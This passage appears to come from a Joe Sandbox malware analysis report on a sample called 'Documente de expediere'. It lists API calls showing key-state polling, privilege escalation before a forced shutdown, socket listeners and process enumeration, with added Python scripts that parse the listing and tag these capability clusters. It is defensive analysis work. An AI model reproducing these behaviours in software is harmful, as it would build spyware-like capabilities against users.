                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                • String ID: $@$SeShutdownPrivilege
                                                • API String ID: 2234035333-194228
                                                • Opcode ID: 3194a206b811e2f1e302e1b761adb24d51e9a6e1ef2f519cad937c6ef2b23698
                                                • Instruction ID: 49c7e03e652fbdd4eb5c63ee59959d46b5f4f04a09746ff6042b51e5b8326cc8
                                                • Opcode Fuzzy Hash: 3194a206b811e2f1e302e1b761adb24d51e9a6e1ef2f519cad937c6ef2b23698
                                                • Instruction Fuzzy Hash: 6C014731655F196EE7286678DC4ABFA72DAEB05743F204034FF0BD21D3DA540C818194
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __itow__swprintf
                                                • String ID: Oaj
                                                • API String ID: 674341424-1426506063
                                                • Opcode ID: f27497298da3600128fcc9e5fe5a2a55218577a351c16450d03e37744507312a
                                                • Instruction ID: 29b534a42be0d61ce1cf418194ebfaf83ad6e54c8a5cb42e18681bed7bd1bf6d
                                                • Opcode Fuzzy Hash: f27497298da3600128fcc9e5fe5a2a55218577a351c16450d03e37744507312a
                                                • Instruction Fuzzy Hash: 62229C719083519FCB64EF18C881BAEB7E6AF85300F14491DF89697391EB31EE05CB96
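The entries above share one layout: direct calls as "Name.MODULE(args), ref: address" bullets, calls reached through a "Part of subcall function" prefix, a "$"-joined String ID, and an Instruction Fuzzy Hash line that closes each record. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses that layout from a constructed excerpt of three entries copied from this page, decodes the constant virtual-key arguments of the GetAsyncKeyState/GetKeyState probes (0xA0 VK_LSHIFT, 0xA1 VK_RSHIFT, 0x11 VK_CONTROL, 0x12 VK_MENU, 0x5B VK_LWIN, per winuser.h) and tags API clusters a triage analyst would want surfaced, such as modifier-key polling, LookupPrivilegeValueW/AdjustTokenPrivileges followed by ExitWindowsEx, and socket/bind/listen. The RULES table and tag names are my own vocabulary, not Joe Sandbox terminology.

```python
"""Parse Joe Sandbox per-function API listings and tag capability clusters.
Added example, not part of the report; SAMPLE is a constructed excerpt of three entries
copied from the listing above, and RULES/tag names are my own choice of vocabulary."""
import re
from dataclasses import dataclass, field

# "• GetAce.ADVAPI32(?,00000000,?), ref: 006E82DD" or
# "• Part of subcall function 006E8CC3: GetLastError.KERNEL32 ref: 006E8D47"
CALL_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<func>[A-Za-z_@:$][\w@:$]*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
FIELD_RE = re.compile(r"^•\s*(API ID|String ID|Instruction Fuzzy Hash):\s*(.*)$")
FIELDS = {"API ID": "api_id", "String ID": "string_id", "Instruction Fuzzy Hash": "fuzzy_hash"}

# winuser.h virtual-key codes seen as GetAsyncKeyState/GetKeyState arguments.
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN",
            0x5C: "VK_RWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL",
            0xA3: "VK_RCONTROL", 0xA4: "VK_LMENU", 0xA5: "VK_RMENU"}

# Tag -> API names that must all be present, directly or through a subcall.
RULES = {
    "modifier-key-polling": {"GetAsyncKeyState", "GetKeyState"},
    "dacl-tampering": {"AddAce", "SetSecurityDescriptorDacl", "SetUserObjectSecurity"},
    "privilege-adjust": {"LookupPrivilegeValueW", "AdjustTokenPrivileges"},
    "forced-shutdown": {"ExitWindowsEx"},
    "tcp-listener": {"socket", "bind", "listen"},
    "directory-walk": {"FindFirstFileW", "FindNextFileW"},
}

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)     # (func, module, args, ref)
    subcalls: list = field(default_factory=list)  # (caller, func, module, args, ref)
    api_id: str = ""
    string_id: str = ""
    fuzzy_hash: str = ""

    def api_names(self):
        return {c[0] for c in self.calls} | {s[1] for s in self.subcalls}

    def strings(self):  # the report joins a function's string references with "$"
        return [s for s in self.string_id.split("$") if s.strip()]

    def tags(self):
        names = self.api_names()
        return [tag for tag, need in RULES.items() if need <= names]

    def polled_keys(self):  # constant key-state arguments decoded in call order, no repeats
        seen = {}
        for func, _mod, args, _ref in self.calls:
            first = args.split(",")[0]
            if func in ("GetAsyncKeyState", "GetKeyState") and re.fullmatch(r"[0-9A-F]{8}", first):
                code = int(first, 16)
                seen[VK_NAMES.get(code, f"0x{code:02X}")] = None
        return list(seen)

def parse_report(text):
    """One FunctionEntry per record; the 'Instruction Fuzzy Hash' field closes a record."""
    entries, cur = [], FunctionEntry()
    for raw in text.splitlines():
        line = raw.strip()
        if m := FIELD_RE.match(line):
            setattr(cur, FIELDS[m.group(1)], m.group(2).strip())
            if m.group(1) == "Instruction Fuzzy Hash":
                entries.append(cur)
                cur = FunctionEntry()
        elif m := CALL_RE.match(line):
            rec = (m["func"], m["mod"], m["args"] or "", m["ref"])
            if m["sub"]:
                cur.subcalls.append((m["sub"],) + rec)
            else:
                cur.calls.append(rec)
    if cur.calls or cur.subcalls:  # listing cut off before its closing hash line
        entries.append(cur)
    return entries

SAMPLE = """\
APIs
• GetKeyboardState.USER32(?), ref: 006F0241
• GetAsyncKeyState.USER32(000000A0), ref: 006F02C2
• GetAsyncKeyState.USER32(000000A1), ref: 006F02F7
• GetAsyncKeyState.USER32(00000011), ref: 006F0324
• GetAsyncKeyState.USER32(00000012), ref: 006F034E
• GetKeyState.USER32(0000005B), ref: 006F038A
• API ID: State$Async$Keyboard
• Instruction Fuzzy Hash: DF4188355047CF6EFF319A6488083F5BEA26F12344F58809EDBC6463C3EB955AD487A2
APIs
  • Part of subcall function 006E8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E8D0D
  • Part of subcall function 006E8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8D3A
• ExitWindowsEx.USER32(?,00000000), ref: 006F549B
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $@$SeShutdownPrivilege
• Instruction Fuzzy Hash: 6C014731655F196EE7286678DC4ABFA72DAEB05743F204034FF0BD21D3DA540C818194
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007065EF
• bind.WSOCK32(00000000,?,00000010), ref: 0070661A
• listen.WSOCK32(00000000,00000005), ref: 00706629
• API ID: ErrorLast$bindclosesocketlistensocket
"""

if __name__ == "__main__":
    for e in parse_report(SAMPLE):
        print(e.fuzzy_hash[:8] or "(no hash)", e.tags(), e.polled_keys(), e.strings())
```

Running the script prints one line per record with its hash prefix, tags, decoded keys and referenced strings. The last record on this page is cut off before its Instruction Fuzzy Hash, so the parser closes a trailing record at end of input instead of dropping it. Memory Dump Source, Associated and Snapshot lines never match the call or field patterns and are ignored, which is what makes the same loop usable on a full listing rather than only on the excerpt.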
                                                APIs
                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007065EF
                                                • WSAGetLastError.WSOCK32(00000000), ref: 007065FE
                                                • bind.WSOCK32(00000000,?,00000010), ref: 0070661A
                                                • listen.WSOCK32(00000000,00000005), ref: 00706629
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706643
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00706657
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketlistensocket
                                                • String ID:
                                                • API String ID: 1279440585-0
                                                • Opcode ID: a8357d2eff28d7aef7a459a7d29b320253fa7a49f18f328b629e1b422f2ee467
                                                • Instruction ID: fee3730acd94984ea70c347be21fb9342a18efa6252cc4d71a57090934e537e6
                                                • Opcode Fuzzy Hash: a8357d2eff28d7aef7a459a7d29b320253fa7a49f18f328b629e1b422f2ee467
                                                • Instruction Fuzzy Hash: F7219E30600200DFCB10EF68CC55A6EB7E9EF45320F14826DF956A73D1CB74AD118B69
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • DefDlgProcW.USER32(?,?,?,?,?), ref: 006919FA
                                                • GetSysColor.USER32(0000000F), ref: 00691A4E
                                                • SetBkColor.GDI32(?,00000000), ref: 00691A61
                                                  • Part of subcall function 00691290: DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ColorProc$LongWindow
                                                • String ID:
                                                • API String ID: 3744519093-0
                                                • Opcode ID: adc1fc12ca2b961b42242041246e06344397862e51567b87914be644cd9fa6cc
                                                • Instruction ID: cfb0ee84d2155a4652009364c3cbf6eb1bcbe94ebde611da66a961d7c382a23a
                                                • Opcode Fuzzy Hash: adc1fc12ca2b961b42242041246e06344397862e51567b87914be644cd9fa6cc
                                                • Instruction Fuzzy Hash: 41A13870105546BAEF28AB294C5AEFF359FDB43341F34411EF402DEAD1CE289D4292B9
                                                APIs
                                                  • Part of subcall function 007080A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 007080CB
                                                • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00706AB1
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706ADA
                                                • bind.WSOCK32(00000000,?,00000010), ref: 00706B13
                                                • WSAGetLastError.WSOCK32(00000000), ref: 00706B20
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00706B34
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                • String ID:
                                                • API String ID: 99427753-0
                                                • Opcode ID: 83e3ae0899743d37d1a10e937efada769dbe552cd8b54890fd5071bae6166c4d
                                                • Instruction ID: 9a864a6c2bff600e8285049089bf9a11430d1e72f0fb69345f29c9fa1b47e50a
                                                • Opcode Fuzzy Hash: 83e3ae0899743d37d1a10e937efada769dbe552cd8b54890fd5071bae6166c4d
                                                • Instruction Fuzzy Hash: 8C41B175B00210AFEF50AF28DC96F6E77EADB04720F04C15CF91AAB2D2CA749D0187A5
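The two Winsock records above (socket/bind/listen at 007065EF and socket/bind at 00706AB1) differ only in the socket() triple: (2,1,6) is AF_INET/SOCK_STREAM/IPPROTO_TCP, (2,2,0x11) is AF_INET/SOCK_DGRAM/IPPROTO_UDP, and the bind namelen 0x10 is sizeof(sockaddr_in). The following decoder is an added example for reading such call lines, not code from the report, the sandbox or the sample; the constant tables are the documented Winsock values, and the sample lines it parses are copied from the two records above.

```python
import re

# Winsock constant tables (documented values, not taken from the sample)
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
IPPROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}

# Matches the plugin's "api.MODULE(arg,arg,...), ref: ADDR" call notation
CALL_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\)(?:,\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)


def parse_args(arg_text):
    """Arguments are printed as zero-padded hex; '?' marks an unresolved value."""
    vals = []
    for tok in arg_text.split(","):
        tok = tok.strip()
        if tok:
            vals.append(None if tok == "?" else int(tok, 16))
    return vals


def decode_winsock_call(line):
    """Return a dict describing one socket/bind/listen call line, or None."""
    m = CALL_RE.search(line)
    if not m:
        return None
    api, args = m.group("api"), parse_args(m.group("args"))
    out = {"api": api, "ref": m.group("ref")}
    if api == "socket" and len(args) >= 3:
        out["family"] = AF.get(args[0], f"af={args[0]}")
        out["type"] = SOCK_TYPE.get(args[1], f"type={args[1]}")
        out["protocol"] = IPPROTO.get(args[2], f"proto={args[2]}")
    elif api == "bind" and len(args) >= 3:
        out["namelen"] = args[2]          # 0x10 == sizeof(sockaddr_in)
    elif api == "listen" and len(args) >= 2:
        out["backlog"] = args[1]
    return out


def summarize_socket_function(lines):
    """Classify a function from its Winsock calls: TCP listener, UDP bind, or other."""
    calls = [c for c in (decode_winsock_call(l) for l in lines) if c]
    sock = next((c for c in calls if c["api"] == "socket"), None)
    if sock is None:
        return "no socket() call"
    apis = {c["api"] for c in calls}
    listen = next((c for c in calls if c["api"] == "listen"), None)
    if sock["type"] == "SOCK_STREAM" and "bind" in apis and listen:
        return f"TCP listener ({sock['family']}, backlog {listen['backlog']})"
    if sock["type"] == "SOCK_DGRAM" and "bind" in apis:
        return f"UDP socket bound ({sock['family']})"
    return f"{sock['type']} socket, calls: {sorted(apis)}"


# Call lines copied from the two records above
TCP_LINES = [
    "• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 007065EF",
    "• WSAGetLastError.WSOCK32(00000000), ref: 007065FE",
    "• bind.WSOCK32(00000000,?,00000010), ref: 0070661A",
    "• listen.WSOCK32(00000000,00000005), ref: 00706629",
    "• WSAGetLastError.WSOCK32(00000000), ref: 00706643",
    "• closesocket.WSOCK32(00000000,00000000), ref: 00706657",
]
UDP_LINES = [
    "• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00706AB1",
    "• WSAGetLastError.WSOCK32(00000000), ref: 00706ADA",
    "• bind.WSOCK32(00000000,?,00000010), ref: 00706B13",
    "• WSAGetLastError.WSOCK32(00000000), ref: 00706B20",
    "• closesocket.WSOCK32(00000000,00000000), ref: 00706B34",
]

if __name__ == "__main__":
    print(summarize_socket_function(TCP_LINES))
    print(summarize_socket_function(UDP_LINES))
```

The classifier only looks at which calls are present and what socket() was asked for; the report does not record the address or port passed to bind (the sockaddr argument prints as "?"), so the listening port is not recoverable from these lines.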
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                • String ID:
                                                • API String ID: 292994002-0
                                                • Opcode ID: 8feb15d6f9c6957df4cf2b09881ef0c6ea3a44b33c554b39b5816c202041bced
                                                • Instruction ID: b6fc3edd82f75c78893642491fda53b9e3f46b460ae8926f75ca7529299b831f
                                                • Opcode Fuzzy Hash: 8feb15d6f9c6957df4cf2b09881ef0c6ea3a44b33c554b39b5816c202041bced
                                                • Instruction Fuzzy Hash: FF11C831700A109FDB151F2EDC44AAF779DEF94B61B40802DF406D72C1CB38D9418AE9
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 006FC69D
                                                • CoCreateInstance.OLE32(00722D6C,00000000,00000001,00722BDC,?), ref: 006FC6B5
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • CoUninitialize.OLE32 ref: 006FC922
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateInitializeInstanceUninitialize_memmove
                                                • String ID: .lnk
                                                • API String ID: 2683427295-24824748
                                                • Opcode ID: a60ed6d944417dbe3287303862ad37ca2066bf9a905175c77519c34d6315fac3
                                                • Instruction ID: fe7a96145180507f0167ce160b844ee2b6845dbdd2ba9c612cae4998aea1956e
                                                • Opcode Fuzzy Hash: a60ed6d944417dbe3287303862ad37ca2066bf9a905175c77519c34d6315fac3
                                                • Instruction Fuzzy Hash: 4CA12971108305AFD740EF58C881EABB7EDEF94714F00492CF156971A2EB70EA49CB66
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,006D1D88,?), ref: 0070C312
                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0070C324
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                • API String ID: 2574300362-1816364905
                                                • Opcode ID: 5e616ee490dbc9c6ef599db285cb1b937d3c203fa457feb65f07d0e2ec592658
                                                • Instruction ID: 698f322903682863e61dd4d806f874f0fbef23ae557813e3fab3c5df3d1c8af9
                                                • Opcode Fuzzy Hash: 5e616ee490dbc9c6ef599db285cb1b937d3c203fa457feb65f07d0e2ec592658
                                                • Instruction Fuzzy Hash: A9E0ECB4610713DFDB214F29D804A96B6D4EB08755B80C639E895D22A0E77CD880DB61
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 0070F151
                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0070F15F
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • Process32NextW.KERNEL32(00000000,?), ref: 0070F21F
                                                • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0070F22E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                • String ID:
                                                • API String ID: 2576544623-0
                                                • Opcode ID: f53fea8b9ac7eef33a4d7d4c856e632acde1004c97ecd7a7f695df4b9b81fc6e
                                                • Instruction ID: 95d33708f787fbc9e96b24abe861455184efc1fa84eb12391f399f75b20fad7e
                                                • Opcode Fuzzy Hash: f53fea8b9ac7eef33a4d7d4c856e632acde1004c97ecd7a7f695df4b9b81fc6e
                                                • Instruction Fuzzy Hash: 3D518C71504300AFD760EF24DC85A6BBBE9FF94710F10492DF596972A1EB30A908CB96
                                                APIs
                                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 006EEB19
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: ($|
                                                • API String ID: 1659193697-1631851259
                                                • Opcode ID: 54ebb2c11b631db4d80f324108ca87e41ea23c12bcc6e7ddd4f2e32e2b12e0ef
                                                • Instruction ID: c8b7c9eea671c93ebb4fe1bea59fa25150ed3f6362c9ef19752a22f897dd6336
                                                • Opcode Fuzzy Hash: 54ebb2c11b631db4d80f324108ca87e41ea23c12bcc6e7ddd4f2e32e2b12e0ef
                                                • Instruction Fuzzy Hash: 31324774A017459FD728CF19C481AAAB7F1FF48320B15C56EE89ACB3A1E771E981CB44
                                                APIs
                                                • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 007026D5
                                                • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0070270C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Internet$AvailableDataFileQueryRead
                                                • String ID:
                                                • API String ID: 599397726-0
                                                • Opcode ID: caf942d958f56cb5fca9ad31c6de4d9162a80569fd58788084b8c6595f32701d
                                                • Instruction ID: a543c53d2c003a8c5fe43d86b600ce6295448cfc27abfaa0a412f8ebb018112d
                                                • Opcode Fuzzy Hash: caf942d958f56cb5fca9ad31c6de4d9162a80569fd58788084b8c6595f32701d
                                                • Instruction Fuzzy Hash: C941C772500209FFEB20DA54DC89EBBB7FCEB40714F10416EF605A65C2DA7A9D829754
                                                APIs
                                                • SetErrorMode.KERNEL32(00000001), ref: 006FB5AE
                                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 006FB608
                                                • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 006FB655
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ErrorMode$DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1682464887-0
                                                • Opcode ID: 024545b31f37fdc0ec996d8f4d95ccd8eab52f089699f4a0c6a63f2d975857e8
                                                • Instruction ID: 99c48c345f9f435c47dd7708459b969162b4937ae82a2b1b043da82ee6ad6e0a
                                                • Opcode Fuzzy Hash: 024545b31f37fdc0ec996d8f4d95ccd8eab52f089699f4a0c6a63f2d975857e8
                                                • Instruction Fuzzy Hash: 4C216035A00618EFCB00EF69D880AEDBBB9FF49310F1480ADE905EB351DB319916CB59
                                                APIs
                                                  • Part of subcall function 006B0FF6: std::exception::exception.LIBCMT ref: 006B102C
                                                  • Part of subcall function 006B0FF6: __CxxThrowException@8.LIBCMT ref: 006B1041
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E8D0D
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8D3A
                                                • GetLastError.KERNEL32 ref: 006E8D47
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                • String ID:
                                                • API String ID: 1922334811-0
                                                • Opcode ID: 4c689a5ae0299fbb66ddfc5992f0eea0a7cf059a8e4e498453d9f71ca0ff220e
                                                • Instruction ID: de931cde6ea11790d73c5af4925b2d4ad337bfe0d5c1ec2b59d49d4f7dc88e3c
